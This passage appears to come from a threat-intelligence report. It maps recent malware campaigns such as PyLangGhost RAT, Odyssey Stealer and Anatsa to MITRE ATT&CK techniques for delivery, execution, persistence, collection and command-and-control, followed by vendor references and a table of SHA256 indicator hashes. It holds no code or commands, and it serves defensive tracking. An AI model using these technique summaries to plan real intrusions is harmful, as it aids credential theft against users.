Android Banking Malware Campaign (India)	T1476 – Deliver Malicious App via Play Store	T1409 – Execute via Malicious App	T1402 – App Auto-Start (BOOT_COMPLETED)	T1417 – Capture SMS/credentials, T1414 – Input Capture	T1437 – Application Layer Protocol
SalatStealer (via Amadey Loader)	T1566.001 – Phishing Attachment	T1059 – Command Execution	T1547.001 – Registry Run Keys	T1005 – Data from Local System	T1071.001 – Web C2
PyLangGhost RAT (Lazarus)	T1566.002 – Spearphishing Link	T1059.006 – Scripting (Python)	T1547 – Persistence via Registry/Services	T1005 – Data from Local System, T1041 – Exfiltration over C2	T1071.001 – Encrypted Web C2
XTinyLoader	T1566 – Phishing with malicious loaders	T1055 – Process Injection	T1547.001 – Registry Persistence	T1005 – Harvest system/browser data	T1105 – Ingress Tool Transfer
DarkCloud Stealer	T1566.002 – Malvertising/Phishing Sites	T1204.002 – User Execution	T1547.001 – Registry Run Keys	T1005 – Data from Local System	T1071.001 – Web Protocols
Minecraft Mod / Fake Cheat Dropping NjRat	T1195 – Drive-by Compromise	T1204.002 – User Execution	T1547.001 – Registry Keys	T1005 – File/credential theft	T1071.001 – Encrypted Web
Rhadamanthys (ClickFix Campaign)	T1566.002 – Phishing via Fake Copyright Emails	T1059 – Command Execution	T1547.001 – Registry Run Keys	T1555 – Credential Dumping	T1071.001 – Web C2
Lazarus Android Stealer (Overlay + SMS)	T1476 – Malicious App	T1409 – Malicious APK Execution	T1402 – Boot Completed Persistence	T1412 – SMS Harvesting, T1417 – Credentials	T1437 – App Layer C2
HijackLoader (via Pirated Cracks)	T1195 – Drive-by Compromise / cracked software	T1055 – Process Injection	T1547.001 – Registry Keys	T1005 – File and credential theft	T1071.001 – Web C2
Noodlophile Stealer (Copyright Phishing)	T1566.002 – Spearphishing Link (copyright lure)	T1204.002 – User Execution	T1547.001 – Registry Persistence	T1555 – Browser Cookie Theft	T1071.001 – Web C2, T1105 – File Transfer
Odyssey Stealer (ClickFix macOS)	T1566.002 – Fake CAPTCHA pages	T1059.004 – Unix Shell Execution	T1547 – LaunchAgents/Plists	T1005 – Harvest files, T1552.001 – Credentials in Keychain	T1071.001 – HTTPS
QuirkyLoader	T1566.001 – Malspam Attachments	T1055 – Process Hollowing	T1547.001 – Registry Run Keys	T1005 – Harvested Data	T1071.001 – HTTPS C2
Remcos RAT (Internet Archive Abuse)	T1566 – Spearphishing with JS Loader	T1059 – PowerShell Execution	T1547.001 – Registry Keys	T1005 – Data Theft	T1071.001 – Web C2
GodRAT (Gh0st RAT Evolution)	T1566.001 – Malicious SCR/PIF Files via Skype	T1055 – Process Injection	T1547 – Registry Persistence	T1005 – File & Browser Data	T1071.001 – Encrypted TCP
SHAMOS (COOKIE SPIDER macOS)	T1566.002 – Malvertising / Fake macOS Help Sites	T1059.004 – Unix Shell Execution	T1547 – Plist LaunchAgents	T1005 – Harvest files, wallets, Keychain	T1071.001 – HTTPS
Anatsa (Fake Apps on Google Play)	T1476 – Malicious Mobile App	T1409 – Malicious APK Execution	T1402 – Boot Completed Persistence	T1414 – Keylogging, T1417 – Input Capture	T1437 – App Layer Protocol
Tamperedchef (PDF Editor)	T1566.001 – Drive-by Compromise via Ads	T1204.002 – User Execution	T1547.001 – Registry Keys	T1005 – Data from Local System	T1071.001 – Web C2

References

https://hackedlist.io/statistics

https://www.infostealers.com/info-stealers-reports/

https://x.com/suyog41/status/1950863888943100111

https://www.sentinelone.com/labs/ghost-in-the-zip-new-pxa-stealer-and-its-telegram-powered-ecosystem/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/android-malware-targets-indian-banking-users-to-steal-financial-info-and-mine-crypto/

https://x.com/abuse_ch/status/1952720761472373029

https://any.run/cybersecurity-blog/pylangghost-malware-analysis/

https://x.com/abuse_ch/status/1953451934863520119

https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain/

https://www.pointwild.com/threat-intelligence/fake-minecraft-game-spreads-njrat-malware-what-you-need-to-know

https://x.com/anyrun_app/status/1955260801968672841

https://www.cyfirma.com/research/lazarus-stealer-android-malware-for-russian-bank-credential-theft-through-overlay-and-sms-manipulation/

https://www.trellix.com/blogs/research/analysis-of-hijackloader-and-its-infection-chain/

https://www.morphisec.com/blog/noodlophile-stealer-evolves-targeted-copyright-phishing-hits-enterprises-with-social-media-footprints/

https://www.forcepoint.com/blog/x-labs/odyssey-stealer-attacks-macos-users

https://www.ibm.com/think/x-force/ibm-x-force-threat-analysis-quirkyloader

https://x.com/vmray/status/1958135753634115657

https://securelist.com/godrat/117119/

https://www.crowdstrike.com/en-us/blog/falcon-prevents-cookie-spider-shamos-delivery-macos/

https://www.zscaler.com/blogs/security-research/android-document-readers-and-deception-tracking-latest-updates-anatsa

https://www.truesec.com/hub/blog/tamperedchef-the-bad-pdf-editor

Indicators & Samples

SHA256	Stealer/Malware
0014e6039ee21d109d1c7cf79351ae8287f499fd4d0df824a8ed68cfdb74eeb5	Lumma Stealer
022ae7b2b0900b190f32014ce1bb3c22654e092bc7d0f390e92b24ea35ad4574	Lumma Stealer
02ffc4ad3754375c76a503a8b38819a5927f894473c95874b7aed5606f844c3e	Lumma Stealer
05cdc67ae52e62e5ecd61f50e8209b6815b8bb229f289e5be35854fc8b81466d	Lumma Stealer
07264acc70af678ef6ba94a1545f3be9edd50b35f47fee93a4887ee5759b4937	Lumma Stealer
19e024dd726c7a07838b751127cd8d98797f46ed0605bda57421069fd5ca0d53	Lumma Stealer
4e36d68bad9b0d15464ef5447ad6989ea3a173de265118d045444b0082a4dad8	FSB Stealer
c1130d2873ac3ea546dd8886d90ce49d9e262b44228416155db1cf83c6fab0eb	PXA Stealer
e0a1d5e205ee874e0aeb03f48841d1be75d0e08d10c2d185d9566cfc37007db9	PXA Stealer
8d8b2b52487db0ab9b2c1c81e8fa7f5042bc0207d7769e7dfb2e5e6ab92e8f26	PXA Stealer
b5d85d668ad52173bf6022149b35f4fe35cf928deccfceef1f6b44e38ee52e56	PXA Stealer
79130ecdf4d02dea191723aa3f1499dba3e24d8b2b93e40762cf905f61836b20	PXA Stealer
0bab23a96741d16f5a4f1a55f6f17adca8f8a9810f79f356311a9a4bb99c1040	PXA Stealer
be3aa7bd793102e14564b0b0fd9539bdf5b84c45fab5f580c8112eb8afca99e1	PXA Stealer
c83ef9e71889b19d9a73ef9e443d166d464ee09260c7abda89620d7e87dbf28c	PXA Stealer
55f4070fb8e3b6676e18b5ed1067dd04cee4c2bf247e4c472f74c8c12ae7579b	PXA Stealer
84e49399ce23b0d577f589cf4211e7527d50ee42debe5e490f7fd6d46e78dd5e	PXA Stealer
2c1025c92925fec9c500e4bf7b4e9580f9342d44e21a34a44c1bce435353216c	Android Banking Malware
b01185e1fba96209c01f00728f6265414dfca58c92a66c3b4065a344f72768ce	Android Banking Malware
80c6435f859468e660a92fc44a2cd80c059c05801dae38b2478c5874429f12a0	Android Banking Malware
59c6a0431d25be7e952fcfb8bd00d3815d8b5341c4b4de54d8288149090dcd74	Android Banking Malware
40bae6f2f736fcf03efdbe6243ff28c524dba602492b0dbb5fd280910a87282d	Android Banking Malware
8b94f5fa94f35e5ba47ce260b009b34401c5c54042d7b7252c8c7d13bf8d9f05	SalatStealer (WEB_RAT)
bb794019f8a63966e4a16063dc785fafe8a5f7c7553bcd3da661c7054c6674c7	PyLangGhost RAT
c4fd45bb8c33a5b0fa5189306eb65fa3db53a53c1092078ec62f3fc19bc05dcb	PyLangGhost RAT
c7ecf8be40c1e9a9a8c3d148eb2ae2c0c64119ab46f51f603a00b812a7be3b45	PyLangGhost RAT
a179caf1b7d293f7c14021b80deecd2b42bbd409e052da767e0d383f71625940	PyLangGhost RAT
ef04a839f60911a5df2408aebd6d9af432229d95b4814132ee589f178005c72f	PyLangGhost RAT
e20f1db8d1b5aabb02c30f519eccca478917073cb99a253a8dbcd2a08178a75e	XTinyLoader
c638a26d07b963ae0847aa1db66dabd984114d12fdccc705e4323d2699bef552	XTinyLoader
b98b360fbc569c15da4794979e65d50eb388c536883e9426c1459a09a7493e32	XTinyLoader
cb8e51509572da021549b08d153773df46f02d481d795e39e2a1ebf03d1cdba4	XTinyLoader